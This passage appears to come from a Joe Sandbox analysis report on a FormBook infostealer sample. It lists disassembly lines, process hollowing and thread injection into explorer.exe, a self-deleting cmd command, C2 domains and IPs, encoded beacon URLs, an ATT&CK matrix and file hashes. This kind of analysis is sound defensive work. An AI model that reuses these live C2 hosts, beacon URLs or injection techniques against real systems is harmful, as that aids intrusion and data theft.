          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2FF10 mov eax, dword ptr fs:[00000030h]16_2_02C2FF10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAFF60 mov eax, dword ptr fs:[00000030h]16_2_02BAFF60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAEF40 mov eax, dword ptr fs:[00000030h]16_2_02BAEF40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C68CD6 mov eax, dword ptr fs:[00000030h]16_2_02C68CD6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA849B mov eax, dword ptr fs:[00000030h]16_2_02BA849B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16CF0 mov eax, dword ptr fs:[00000030h]16_2_02C16CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16CF0 mov eax, dword ptr fs:[00000030h]16_2_02C16CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16CF0 mov eax, dword ptr fs:[00000030h]16_2_02C16CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C514FB mov eax, dword ptr fs:[00000030h]16_2_02C514FB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCBC2C mov eax, dword ptr fs:[00000030h]16_2_02BCBC2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2C450 mov eax, dword ptr fs:[00000030h]16_2_02C2C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2C450 mov eax, dword ptr fs:[00000030h]16_2_02C2C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C51C06 mov eax, dword ptr fs:[00000030h]16_2_02C51C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C6740D mov eax, dword ptr fs:[00000030h]16_2_02C6740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C6740D mov eax, dword ptr fs:[00000030h]16_2_02C6740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C6740D mov eax, dword ptr fs:[00000030h]16_2_02C6740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16C0A mov eax, dword ptr fs:[00000030h]16_2_02C16C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16C0A mov eax, dword ptr fs:[00000030h]16_2_02C16C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16C0A mov eax, dword ptr fs:[00000030h]16_2_02C16C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16C0A mov eax, dword ptr fs:[00000030h]16_2_02C16C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BB746D mov eax, dword ptr fs:[00000030h]16_2_02BB746D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCA44B mov eax, dword ptr fs:[00000030h]16_2_02BCA44B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16DC9 mov eax, dword ptr fs:[00000030h]16_2_02C16DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16DC9 mov eax, dword ptr fs:[00000030h]16_2_02C16DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16DC9 mov eax, dword ptr fs:[00000030h]16_2_02C16DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16DC9 mov ecx, dword ptr fs:[00000030h]16_2_02C16DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16DC9 mov eax, dword ptr fs:[00000030h]16_2_02C16DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C16DC9 mov eax, dword ptr fs:[00000030h]16_2_02C16DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC1DB5 mov eax, dword ptr fs:[00000030h]16_2_02BC1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC1DB5 mov eax, dword ptr fs:[00000030h]16_2_02BC1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC1DB5 mov eax, dword ptr fs:[00000030h]16_2_02BC1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC35A1 mov eax, dword ptr fs:[00000030h]16_2_02BC35A1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCFD9B mov eax, dword ptr fs:[00000030h]16_2_02BCFD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCFD9B mov eax, dword ptr fs:[00000030h]16_2_02BCFD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5FDE2 mov eax, dword ptr fs:[00000030h]16_2_02C5FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5FDE2 mov eax, dword ptr fs:[00000030h]16_2_02C5FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5FDE2 mov eax, dword ptr fs:[00000030h]16_2_02C5FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5FDE2 mov eax, dword ptr fs:[00000030h]16_2_02C5FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B92D8A mov eax, dword ptr fs:[00000030h]16_2_02B92D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B92D8A mov eax, dword ptr fs:[00000030h]16_2_02B92D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B92D8A mov eax, dword ptr fs:[00000030h]16_2_02B92D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B92D8A mov eax, dword ptr fs:[00000030h]16_2_02B92D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B92D8A mov eax, dword ptr fs:[00000030h]16_2_02B92D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C48DF1 mov eax, dword ptr fs:[00000030h]16_2_02C48DF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC2581 mov eax, dword ptr fs:[00000030h]16_2_02BC2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC2581 mov eax, dword ptr fs:[00000030h]16_2_02BC2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC2581 mov eax, dword ptr fs:[00000030h]16_2_02BC2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC2581 mov eax, dword ptr fs:[00000030h]16_2_02BC2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAD5E0 mov eax, dword ptr fs:[00000030h]16_2_02BAD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAD5E0 mov eax, dword ptr fs:[00000030h]16_2_02BAD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C605AC mov eax, dword ptr fs:[00000030h]16_2_02C605AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C605AC mov eax, dword ptr fs:[00000030h]16_2_02C605AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C13540 mov eax, dword ptr fs:[00000030h]16_2_02C13540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C43D40 mov eax, dword ptr fs:[00000030h]16_2_02C43D40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC4D3B mov eax, dword ptr fs:[00000030h]16_2_02BC4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC4D3B mov eax, dword ptr fs:[00000030h]16_2_02BC4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC4D3B mov eax, dword ptr fs:[00000030h]16_2_02BC4D3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9AD30 mov eax, dword ptr fs:[00000030h]16_2_02B9AD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA3D34 mov eax, dword ptr fs:[00000030h]16_2_02BA3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBC577 mov eax, dword ptr fs:[00000030h]16_2_02BBC577
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBC577 mov eax, dword ptr fs:[00000030h]16_2_02BBC577
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BB7D50 mov eax, dword ptr fs:[00000030h]16_2_02BB7D50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C68D34 mov eax, dword ptr fs:[00000030h]16_2_02C68D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C1A537 mov eax, dword ptr fs:[00000030h]16_2_02C1A537
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5E539 mov eax, dword ptr fs:[00000030h]16_2_02C5E539
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD3D43 mov eax, dword ptr fs:[00000030h]16_2_02BD3D43
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Code function: 2_2_0040ACF0 LdrLoadDll,2_2_0040ACF0
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe | Domain query: www.carterscts.com
          Source: C:\Windows\explorer.exe | Domain query: www.lenovoidc.com
          Source: C:\Windows\explorer.exe | Domain query: www.mr-exclusive.com
          Source: C:\Windows\explorer.exe | Network Connect: 198.46.90.29 80
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 200000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Memory written: C:\Users\user\Desktop\NvkGETsSDb.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\ipconfig.exe | Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Process created: C:\Users\user\Desktop\NvkGETsSDb.exe C:\Users\user\Desktop\NvkGETsSDb.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NvkGETsSDb.exe'
          Source: explorer.exe, 00000004.00000000.351908572.0000000001640000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.519261931.0000000004000000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.351908572.0000000001640000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.519261931.0000000004000000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.351908572.0000000001640000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.519261931.0000000004000000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.274817479.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.351908572.0000000001640000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.519261931.0000000004000000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.351908572.0000000001640000.00000002.00020000.sdmp, ipconfig.exe, 00000010.00000002.519261931.0000000004000000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Queries volume information: C:\Users\user\Desktop\NvkGETsSDb.exe VolumeInformation
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 612 | LSA Secrets | System Network Configuration Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 11 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph

          [Figure: behavior graph, ID 510425, sample NvkGETsSDb.exe, start date 27/10/2021, architecture WINDOWS, score 100. Process chain: NvkGETsSDb.exe -> NvkGETsSDb.exe -> explorer.exe (injected) -> ipconfig.exe -> cmd.exe -> conhost.exe.]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label | Link
          NvkGETsSDb.exe | 15% | Virustotal | | Browse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label | Link | Download
          2.2.NvkGETsSDb.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          2.0.NvkGETsSDb.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          2.0.NvkGETsSDb.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          2.0.NvkGETsSDb.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label | Link
          http://www.mr-exclusive.com/s18y/?eXwdIN10=Pa4nojFHNdgR9BnFd7o8aKQocYkXN/E4z79GVA9AtWALsHU61u0W5ib2TTz7NOJsFj7K&3fU4r=D2MpiZv | 0% | Avira URL Cloud | safe |
          http://www.carterscts.com/s18y/?eXwdIN10=4Ci6vsYQWs8id7GhdYTjZRJculBFGSFOZGvHXdH6NGfnjVfmX1rRX92W0hUQgL+8jwmH&3fU4r=D2MpiZv | 0% | Avira URL Cloud | safe |
          www.agentpathleurre.space/s18y/ | 0% | Avira URL Cloud | safe |
          http://www.collada.org/2005/11/COLLADASchema9Done | 0% | URL Reputation | safe |

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          mr-exclusive.com | 184.168.131.241 | true | true | | unknown
          carterscts.com | 198.46.90.29 | true | true | | unknown
          www.lenovoidc.com | unknown | unknown | true | | unknown
          www.mr-exclusive.com | unknown | unknown | true | | unknown
          www.carterscts.com | unknown | unknown | true | | unknown

                    Contacted URLs

                    Name | Malicious | Antivirus Detection | Reputation
                    http://www.mr-exclusive.com/s18y/?eXwdIN10=Pa4nojFHNdgR9BnFd7o8aKQocYkXN/E4z79GVA9AtWALsHU61u0W5ib2TTz7NOJsFj7K&3fU4r=D2MpiZv | true | Avira URL Cloud: safe | unknown
                    http://www.carterscts.com/s18y/?eXwdIN10=4Ci6vsYQWs8id7GhdYTjZRJculBFGSFOZGvHXdH6NGfnjVfmX1rRX92W0hUQgL+8jwmH&3fU4r=D2MpiZv | true | Avira URL Cloud: safe | unknown
                    www.agentpathleurre.space/s18y/ | true | Avira URL Cloud: safe | low

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.afternic.com/forsale/mr-exclusive.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_ | ipconfig.exe, 00000010.00000002.519067627.000000000358F000.00000004.00020000.sdmp | false |  | high
http://www.collada.org/2005/11/COLLADASchema9Done | NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                      Contacted IPs


                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
184.168.131.241 | mr-exclusive.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
198.46.90.29 | carterscts.com | United States | 54641 | INMOTI-1US | true

                      Private

                      IP
                      192.168.2.1

                      General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 510425
Start date: 27.10.2021
Start time: 19:35:13
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 3s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: NvkGETsSDb.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@3/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 56.1% (good quality ratio 52.5%)
• Quality average: 72.6%
• Quality standard deviation: 30.1%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 66
• Number of non-executed functions: 137
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 93.184.220.29, 20.199.120.151, 20.49.157.6, 20.199.120.182, 20.199.120.85, 40.112.88.60, 80.67.82.242, 80.67.82.235, 204.79.197.200, 13.107.21.200, 20.82.210.154
                      • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com
• Not all processes were analyzed, report is missing behavior information

                      Simulations

                      Behavior and APIs

Time | Type | Description
19:36:14 | API Interceptor | 1x Sleep call for process: NvkGETsSDb.exe modified

                      Joe Sandbox View / Context

                      IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                      Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                      ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NvkGETsSDb.exe.log
Process: C:\Users\user\Desktop\NvkGETsSDb.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: true
Reputation: high, very likely benign file
                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                      Static File Info

                      General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 6.723899910809643
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
